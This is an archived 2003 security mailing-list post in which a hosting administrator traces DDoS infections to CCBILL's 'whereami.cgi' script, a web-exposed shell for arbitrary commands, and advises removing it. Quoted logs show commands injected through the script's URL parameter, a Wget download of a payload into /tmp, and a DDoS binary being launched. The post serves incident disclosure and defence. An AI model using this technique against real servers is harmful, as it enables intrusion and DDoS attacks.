Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > incidents > 03 > 071564.html (Request Expert securityfocus.com Support)

Another overflow exploit for Apache? *RESOLVED*

From: Dayne Jordan <djordan(at)completeweb.net>
Date: Thu Jul 03 2003 - 12:46:39 EDT

Greetings again,

We found that this exploit was NOT a result of an Apache exploit.

After waiting for the culprits to attempt their mischeif again, we were waiting and watched as they re-uploaded their rogue Ddos scripts to /tmp and executed thru Apache - not to our surprise, it appears CCBILL once again has some very exploitable 'helper' scripts they upload when installing their software.

On ALL the machines with the Ddos behavior we found, there was one common script on all of them ' whereami.cgi '. This script, when executed from the browser allows system commands to be entered and executed as the web server. We even used wget and lynx thru this command interface to upload various things into /tmp/. Our culprits were uploading old-school and common Ddos binaries, then executing them.. nothing root worthy, but nonetheless a pain in the arse.

Excerpt log entries from our test machines:

Machine getting it - how we uploaded a test binary: 216.226.xxx.xxx - - [03/Jul/2003:12:00:00 -0400] "POST /ccbill/whereami.cgi?g=ls HTTP/1.1" 200 1033 "http://our.test.fileserver/ccbill/whereami.cgi?g=ls" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818; T312461)"

Machine serving it:
216.226.xxx.xxx - - [03/Jul/2003:11:59:59 -0400] "GET /rogue-test.tar HTTP/1.0" 

                    200 286720 "-" "Wget/1.5.1"
Do you need help?X

Other things we did with it:
216.226.xxx.xxx - - [03/Jul/2003:12:44:41 -0400] "GET 

                    /ccbill/whereami.cgi?g=mkdir%20/tmp/boo
                    HTTP/1.1" 200 247 "-" "Mozilla/4.0
                    (compatible; MSIE 5.5; Windows 98; H010818; T312461)"

and then...

su-2.02# ls -la /tmp 

drwxrwxrwt   6 root    wheel    3072 Jul  3 12:42 .
drwxr-xr-x  19 root    wheel     512 Mar 17 17:01 ..
drwxr-xr-x   2 nobody  wheel     512 Jul  3 12:44 boo
srwxrwxrwx   1 mysql   wheel       0 Jul  3 00:05 mysql.sock
[snipped]

And snippet from one of the affected machines running 'hell' a simple Ddos binary:
172.157.111.201 - - [01/Jul/2003:16:58:20 -0400] "GET /ccbill/whereami.cgi?g=v/hell 

                    HTTP/1.1" 200 265 "-" "Mozilla/4.0

Once you initiate the /whereami.cgi?g=ls command from the browser, you then get an input box and an enter button on your browser - execute any command you like, including wget, lynx, tar, sh, etc etc.

This script is most likely used by CCBILL techs as part of their default installation so that they can administer/setup their necessary scripts/software. Unfortunately, there is a huge hole in this script. We have a customer who very recently had CCBILL setup their services on his website and the very same 'whereami.cgi' exists even on this current date build.

So in short, those of you who use CCBILL make sure to remove or render useless the 'whereami.cgi' script in your /ccbill directory(ies). Across all our machines where we know CCBILL exists we've found this script on every one so far - and removed it ;)

D.

Do you need more help?X

>
> Greetings,


Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the world's premier technical IT security event! 10 tracks, 15 training sessions, 1,800 delegates from 30 nations including all of the top experts, from CSO's to "underground" security specialists. See for yourself what the buzz is about! Early-bird registration ends July 3. This event will sell out. www.blackhat.com
Received on Thu Jul 3 14:58:40 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:10 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library